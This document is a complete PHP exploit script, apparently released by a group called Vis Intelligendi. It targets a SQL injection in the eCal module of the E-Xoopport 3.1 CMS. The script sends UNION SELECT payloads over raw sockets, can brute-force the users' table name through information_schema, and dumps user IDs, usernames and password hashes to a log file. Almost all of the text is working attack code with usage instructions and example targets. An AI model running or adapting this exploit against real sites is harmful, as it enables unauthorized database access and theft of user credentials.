<? /* Vis Intelligendi http.//vis-intelligendi.co.cc E-Xooport 3.1 SQL Injection Exploit 01 (Mq on/off doesn't matter) bug details and explanation on http://vis-intelligendi.co.cc (search e-xooport)
E-Xoops is a xoops-based cms. Many modules are bugged, in this case "eCal", no need of quoting code for this advisory. This script will first brute users' table name (if you want) and second will extract all users data from the db (or only one user, if you specify the ID)
usage php exopoort_exploit.php host path [uid]
/* GENERAL CONFIGURATION */ $table = "e_xoops_users"; # THIS MAYBE CHANGES FROM SITE TO SITE, usually users,e_xoops_users, sam_users $brute_table = FALSE; # IF THE EXPLOIT DOES not work first time, probably the reason is the table name, so set this to TRUE and the exploit will brute the table name if mysql version >= 5 # this may take some minutes.. /* EXPLOIT */ error_reporting(0); ini_set("default_socket_timeout",30); set_time_limit(0); function http_send($host, $packet) {
$sock = fsockopen($host, 80); $c = 0; while (!$sock) { if ($c++ == 10) die(); print "\n[-] No response from ".$host.":80 Trying again..."; $sock = fsockopen($host,80); sleep(1); } fputs($sock, $packet); $resp = ""; while (!feof($sock)) $resp .= fread($sock, 1); fclose($sock); return $resp;
} function getContent($resp) { $data = explode("\r\n\r\n", $resp); $content=""; for ($i=1; $i<count($data); $i++) $content .= $data[$i]; return $content;
} function makePacket($page, $sql, $host) {
$packet = "GET ".$page.$sql." HTTP/1.1\r\n"; $packet .= "Host: ".$host."\r\n"; $packet .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv: Gecko/20071008 Firefox/\r\n"; $packet .= "Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3\r\n"; $packet .= "Connection: close\r\n\r\n"; return $packet;
} $s = "0x5649535f494e54454c4c4947454e4449"; $string = "VIS_INTELLIGENDI";
echo <<<SPLASH --------------------------------------------------------------------- Vis Intelligendi http://vis-intelligendi.co.cc SQL Injection 01 (katid) -User,pass,uid extraction exploit
usage: php exploit.php host path [user_id]* php exploit.php www.site.com /exooport/ 1 {without /modules/ dir} php exploit.php www.e-xoopport.it / * If not specified, the exploit will extract all users from the database. ---------------------------------------------------------------------
SPLASH; $host = $argv[1]; $path = $argv[2]; $uid = $argv[3]; $users = ""; if ($host && $path) { $path .= "modules/eCal/display.php?katid="; if ($brute_table) { print "Table brute set ON. Trying to find the table.. this may take some minutes (note: works only with information_schema viewable)\n"; $sql = "-1+union+select+concat($s,table_name,0x3a,$s),0+from+information_schema.tables+limit+[N],1"; $k = 0; $reg = array(); $tables = array(); $ex = str_replace("[N]", $k, $sql); $txt = getContent(http_send($host,makePacket($path,$ex,$host))); $regx = "$string(.+)\:$string"; while(ereg($regx,$txt,$reg)) { $k++; $tables[] = $reg[1]; print $reg[1]."\n"; $regz = array(); if (eregi("(.+)users$",$reg[1],$regz)) { $table = $reg[1]; } $ex = str_replace("[N]", $k, $sql); $txt = getContent(http_send($host,makePacket($path,$ex,$host))); } } print "\n\n [] Table = $table\n\n"; if (!$uid) { $sql = "-1+union+select+concat($s,uid,0x3a,uname,0x3a,pass,$s),0+from+$table+limit+[N],1"; } else { $sql = "-1+union+select+concat($s,uid,0x3a,uname,0x3a,pass,$s),0+from+$table+where+uid=$uid+limit+[N],1"; } $regs = array(); $regex = $string."(.+)".$string; $n = 0; $ex = str_replace("[N]", $n, $sql); $pck = makePacket($path,$ex,$host); $resp = http_send($host,$pck); $txt = getContent($resp); while(ereg($regex,$txt,$regs)) { $users .= $regs[1]."\n"; print $regs[1]."\n"; $n++; $pck = makePacket($path,str_replace("[N]",$n,$sql),$host); $resp = http_send($host,$pck); $txt = getContent($resp); } $write = "\n\nVis Intelligendi". "\n E-Xooport 3.1 SQL Injection Exploit\n". "http://vis-intelligendi.co.cc\n". "Host : $host\n". "Path : $path\n". "http://$host$path$sql\n\n". "table: $table\n\n".$users."\n\n Vis Intelligendi Magia"; fwrite(fopen("exooport_log.txt","w+"),$write); print "Check exooport_log.txt"; } ?>